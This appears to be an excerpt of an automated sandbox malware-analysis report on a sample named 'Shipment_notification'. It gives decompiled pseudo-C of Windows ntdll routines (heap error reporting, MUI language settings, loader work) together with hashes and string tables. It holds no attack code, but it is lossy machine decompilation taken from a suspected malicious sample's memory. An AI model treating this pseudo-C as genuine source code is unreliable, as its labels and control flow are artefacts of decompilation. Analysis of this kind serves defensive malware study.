                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                • API String ID: 0-108210295
                                                                                • Opcode ID: 0dc0c1f392c5599a83b14a96509ed41dfbefc1fd6f2188e9e6de71f5f5f1ffe1
                                                                                • Instruction ID: cc922a94fee18e2f81b016c2976c20c20b69777e0f5b246499249b43a6fc4c3f
                                                                                • Opcode Fuzzy Hash: 0dc0c1f392c5599a83b14a96509ed41dfbefc1fd6f2188e9e6de71f5f5f1ffe1
                                                                                • Instruction Fuzzy Hash: FF811375A40200FFDF29AA5AED85D7B3F35EF56B52F0040E8F5052B252D3618612DBB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BA1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 44%
                                                                                			E01BA1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x1ac48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E01AEB150();
				} else {
					E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1bd589c);
				E01AEB150("Heap error detected at %p (heap handle %p)\n",  *0x1bd58a0);
				_t27 =  *0x1bd5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01BA1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E01AEB150();
				} else {
					E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E01AEB150("Error code: %d - %s\n",  *0x1bd5898);
				_t113 =  *0x1bd58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01AEB150();
					} else {
						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01AEB150("Parameter1: %p\n",  *0x1bd58a4);
				}
				_t115 =  *0x1bd58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01AEB150();
					} else {
						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01AEB150("Parameter2: %p\n",  *0x1bd58a8);
				}
				_t117 =  *0x1bd58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01AEB150();
					} else {
						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E01AEB150("Parameter3: %p\n",  *0x1bd58ac);
				}
				_t119 =  *0x1bd58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E01AEB150();
					} else {
						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1bd58b4);
					E01AEB150("Last known valid blocks: before - %p, after - %p\n",  *0x1bd58b0);
				} else {
					_t120 =  *0x1bd58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E01AEB150();
				} else {
					E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E01AEB150("Stack trace available at %p\n", 0x1bd58c0);
			}











                                                                                0x01ba1c10
                                                                                0x01ba1c16
                                                                                0x01ba1c1e
                                                                                0x01ba1c3d
                                                                                0x01ba1c3e
                                                                                0x01ba1c20
                                                                                0x01ba1c35
                                                                                0x01ba1c3a
                                                                                0x01ba1c44
                                                                                0x01ba1c55
                                                                                0x01ba1c5a
                                                                                0x01ba1c65
                                                                                0x01ba1c67
                                                                                0x00000000
                                                                                0x01ba1c6e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ba1c67
                                                                                0x01ba1cdc
                                                                                0x01ba1ce5
                                                                                0x01ba1d04
                                                                                0x01ba1d05
                                                                                0x01ba1ce7
                                                                                0x01ba1cfc
                                                                                0x01ba1d01
                                                                                0x01ba1d0b
                                                                                0x01ba1d17
                                                                                0x01ba1d1f
                                                                                0x01ba1d25
                                                                                0x01ba1d30
                                                                                0x01ba1d4f
                                                                                0x01ba1d50
                                                                                0x01ba1d32
                                                                                0x01ba1d47
                                                                                0x01ba1d4c
                                                                                0x01ba1d61
                                                                                0x01ba1d67
                                                                                0x01ba1d68
                                                                                0x01ba1d6e
                                                                                0x01ba1d79
                                                                                0x01ba1d98
                                                                                0x01ba1d99
                                                                                0x01ba1d7b
                                                                                0x01ba1d90
                                                                                0x01ba1d95
                                                                                0x01ba1daa
                                                                                0x01ba1db0
                                                                                0x01ba1db1
                                                                                0x01ba1db7
                                                                                0x01ba1dc2
                                                                                0x01ba1de1
                                                                                0x01ba1de2
                                                                                0x01ba1dc4
                                                                                0x01ba1dd9
                                                                                0x01ba1dde
                                                                                0x01ba1df3
                                                                                0x01ba1df9
                                                                                0x01ba1dfa
                                                                                0x01ba1e00
                                                                                0x01ba1e0a
                                                                                0x01ba1e13
                                                                                0x01ba1e32
                                                                                0x01ba1e33
                                                                                0x01ba1e15
                                                                                0x01ba1e2a
                                                                                0x01ba1e2f
                                                                                0x01ba1e39
                                                                                0x01ba1e4a
                                                                                0x01ba1e02
                                                                                0x01ba1e02
                                                                                0x01ba1e08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ba1e08
                                                                                0x01ba1e5b
                                                                                0x01ba1e7a
                                                                                0x01ba1e7b
                                                                                0x01ba1e5d
                                                                                0x01ba1e72
                                                                                0x01ba1e77
                                                                                0x01ba1e95

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                • API String ID: 0-2897834094
                                                                                • Opcode ID: 715bde0c810b5268961090d5681be4548840942af9765033e2f4d26ec4bbc623
                                                                                • Instruction ID: 83f25ff186617a3fdabf3197b87183921afb26e91f93a24712e05b803fe2e7e1
                                                                                • Opcode Fuzzy Hash: 715bde0c810b5268961090d5681be4548840942af9765033e2f4d26ec4bbc623
                                                                                • Instruction Fuzzy Hash: E261D33251A646EFD369EB8DD58DE2473F4EB04970F8981AEF50A5F301E72598408B1A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AF3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E01AF3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01AF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01AF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01AF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01AF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01AF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01B04620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E01B2F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01B31370(_t276, 0x1ac4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E01B2BB40(0,  &_v68, _t170);
									if(L01AF43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E01B2BB40(_t257,  &_v68, _t243);
								if(L01AF43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01B31370(_t278, 0x1ac4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01B04620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E01B2F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01B31370(_v16, 0x1ac4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E01B2BB40(_t262,  &_v68, _t244);
								if(L01AF43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01B31370(_t282, 0x1ac4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E01B2BB40(_t262,  &_v68, _t201);
							if(L01AF43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01B04620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E01B2F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01B31370(_t280, 0x1ac4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E01B2BB40(_t267,  &_v68, _t245);
							if(L01AF43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01B31370(_t284, 0x1ac4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E01B2BB40(_t267,  &_v68, _t224);
						if(L01AF43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                0x01af3d3c
                                                                                0x01af3d42
                                                                                0x01af3d44
                                                                                0x01af3d46
                                                                                0x01af3d49
                                                                                0x01af3d4c
                                                                                0x01af3d4f
                                                                                0x01af3d52
                                                                                0x01af3d55
                                                                                0x01af3d58
                                                                                0x01af3d5b
                                                                                0x01af3d5f
                                                                                0x01af3d61
                                                                                0x01af3d66
                                                                                0x01b48213
                                                                                0x01b48218
                                                                                0x01af4085
                                                                                0x01af4088
                                                                                0x01af408e
                                                                                0x01af4094
                                                                                0x01af409a
                                                                                0x01af40a0
                                                                                0x01af40a6
                                                                                0x01af40a9
                                                                                0x01af40af
                                                                                0x01af40b6
                                                                                0x01af40bd
                                                                                0x01af40bd
                                                                                0x01af3d83
                                                                                0x01b4821f
                                                                                0x01b48229
                                                                                0x01b48238
                                                                                0x01b48238
                                                                                0x01b4823d
                                                                                0x01b4823d
                                                                                0x01af3da0
                                                                                0x01af3daf
                                                                                0x01af3db5
                                                                                0x01af3dba
                                                                                0x01af3dba
                                                                                0x01af3dd4
                                                                                0x01af3e94
                                                                                0x01af3eab
                                                                                0x01af3f6d
                                                                                0x01af3f84
                                                                                0x01af406b
                                                                                0x01af406b
                                                                                0x01af406e
                                                                                0x01af406e
                                                                                0x01af4070
                                                                                0x01af4074
                                                                                0x01b48351
                                                                                0x01b48351
                                                                                0x01af407a
                                                                                0x01af407f
                                                                                0x01b4835d
                                                                                0x01b48370
                                                                                0x01b48377
                                                                                0x01b48379
                                                                                0x01b4837c
                                                                                0x01b4837c
                                                                                0x01b4835d
                                                                                0x00000000
                                                                                0x01af407f
                                                                                0x01af3f8a
                                                                                0x01af3f8d
                                                                                0x01af3f90
                                                                                0x01af3f95
                                                                                0x01b4830d
                                                                                0x01b4830f
                                                                                0x01af3f9b
                                                                                0x01af3fac
                                                                                0x01af3fae
                                                                                0x01af3fb1
                                                                                0x01af3fb1
                                                                                0x01af3fb6
                                                                                0x01b48317
                                                                                0x01b4831a
                                                                                0x00000000
                                                                                0x01af3fbc
                                                                                0x01af3fc1
                                                                                0x01af3fc9
                                                                                0x01af3fd7
                                                                                0x01af3fda
                                                                                0x01af3fdd
                                                                                0x01af4021
                                                                                0x01af4021
                                                                                0x01af4029
                                                                                0x01af4030
                                                                                0x01af4044
                                                                                0x01af4046
                                                                                0x01af4046
                                                                                0x01af4044
                                                                                0x01af4049
                                                                                0x01b48327
                                                                                0x01b48334
                                                                                0x01b48339
                                                                                0x01b4833c
                                                                                0x01af404f
                                                                                0x01af404f
                                                                                0x01af404f
                                                                                0x01af4051
                                                                                0x01af4056
                                                                                0x01af4063
                                                                                0x01af4063
                                                                                0x01af4068
                                                                                0x00000000
                                                                                0x01af4068
                                                                                0x01af3fdf
                                                                                0x01af3fe2
                                                                                0x01af3fe4
                                                                                0x01af3fe7
                                                                                0x01af3fef
                                                                                0x01af4003
                                                                                0x01af4005
                                                                                0x01af4005
                                                                                0x01af400c
                                                                                0x01af4013
                                                                                0x01af4016
                                                                                0x01af4017
                                                                                0x01af401b
                                                                                0x01af401e
                                                                                0x00000000
                                                                                0x01af401e
                                                                                0x01af3fb6
                                                                                0x01af3eb1
                                                                                0x01af3eb4
                                                                                0x01af3eb7
                                                                                0x01af3ebc
                                                                                0x01b482a9
                                                                                0x01b482ab
                                                                                0x01af3ec2
                                                                                0x01af3ed3
                                                                                0x01af3ed5
                                                                                0x01af3ed8
                                                                                0x01af3ed8
                                                                                0x01af3edd
                                                                                0x01b482b3
                                                                                0x01b482b6
                                                                                0x00000000
                                                                                0x01af3ee3
                                                                                0x01af3ee8
                                                                                0x01af3eed
                                                                                0x01af3ef0
                                                                                0x01af3ef3
                                                                                0x01af3f02
                                                                                0x01af3f05
                                                                                0x01af3f08
                                                                                0x01b482c0
                                                                                0x01b482c3
                                                                                0x01b482c5
                                                                                0x01b482c8
                                                                                0x01b482d0
                                                                                0x01b482e4
                                                                                0x01b482e6
                                                                                0x01b482e6
                                                                                0x01b482ed
                                                                                0x01b482f4
                                                                                0x01b482f7
                                                                                0x01b482f8
                                                                                0x01b482fc
                                                                                0x01b482ff
                                                                                0x01b482ff
                                                                                0x01af3f0e
                                                                                0x01af3f11
                                                                                0x01af3f16
                                                                                0x01af3f1d
                                                                                0x01af3f31
                                                                                0x01b48307
                                                                                0x01b48307
                                                                                0x01af3f31
                                                                                0x01af3f39
                                                                                0x01af3f48
                                                                                0x01af3f4d
                                                                                0x01af3f50
                                                                                0x01af3f50
                                                                                0x01af3f53
                                                                                0x01af3f58
                                                                                0x01af3f65
                                                                                0x01af3f65
                                                                                0x01af3f6a
                                                                                0x00000000
                                                                                0x01af3f6a
                                                                                0x01af3edd
                                                                                0x01af3dda
                                                                                0x01af3ddd
                                                                                0x01af3de0
                                                                                0x01af3de5
                                                                                0x01b48245
                                                                                0x01af3deb
                                                                                0x01af3df7
                                                                                0x01af3dfc
                                                                                0x01af3dfe
                                                                                0x01af3e01
                                                                                0x01af3e01
                                                                                0x01af3e06
                                                                                0x01b4824d
                                                                                0x01b4824f
                                                                                0x01b48254
                                                                                0x00000000
                                                                                0x01af3e0c
                                                                                0x01af3e11
                                                                                0x01af3e16
                                                                                0x01af3e19
                                                                                0x01af3e29
                                                                                0x01af3e2c
                                                                                0x01af3e2f
                                                                                0x01b4825c
                                                                                0x01b4825f
                                                                                0x01b48261
                                                                                0x01b48264
                                                                                0x01b4826c
                                                                                0x01b48280
                                                                                0x01b48282
                                                                                0x01b48282
                                                                                0x01b48289
                                                                                0x01b48290
                                                                                0x01b48293
                                                                                0x01b48294
                                                                                0x01b48298
                                                                                0x01b4829b
                                                                                0x01b4829b
                                                                                0x01af3e35
                                                                                0x01af3e38
                                                                                0x01af3e3d
                                                                                0x01af3e44
                                                                                0x01af3e58
                                                                                0x01b482a3
                                                                                0x01b482a3
                                                                                0x01af3e58
                                                                                0x01af3e60
                                                                                0x01af3e6f
                                                                                0x01af3e74
                                                                                0x01af3e77
                                                                                0x01af3e77
                                                                                0x01af3e7a
                                                                                0x01af3e7f
                                                                                0x01af3e8c
                                                                                0x01af3e8c
                                                                                0x01af3e91
                                                                                0x00000000
                                                                                0x01af3e91

                                                                                Strings
                                                                                • Kernel-MUI-Language-SKU, xrefs: 01AF3F70
                                                                                • WindowsExcludedProcs, xrefs: 01AF3D6F
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 01AF3DC0
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01AF3D8C
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01AF3E97
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 0-258546922
                                                                                • Opcode ID: 4ff636f6ab9a4944940ed3fc0a795b1693d349ec0614517a94347a539db4a427
                                                                                • Instruction ID: 5bb1f07a01cdd951c039a2ea6c8278da4ff220836351e282c1e09c95f4acae07
                                                                                • Opcode Fuzzy Hash: 4ff636f6ab9a4944940ed3fc0a795b1693d349ec0614517a94347a539db4a427
                                                                                • Instruction Fuzzy Hash: 65F12C72D00619EBCF16DFD8C980AEEBBB9FF58650F1540AAE605E7251D7349E01CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AF8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E01AF8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E01AF934A() != 0) {
								_t159 = E01B6A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1bd5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01B65510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1bd5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E01AF849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01AF8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01AF8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1bd5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1bd5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
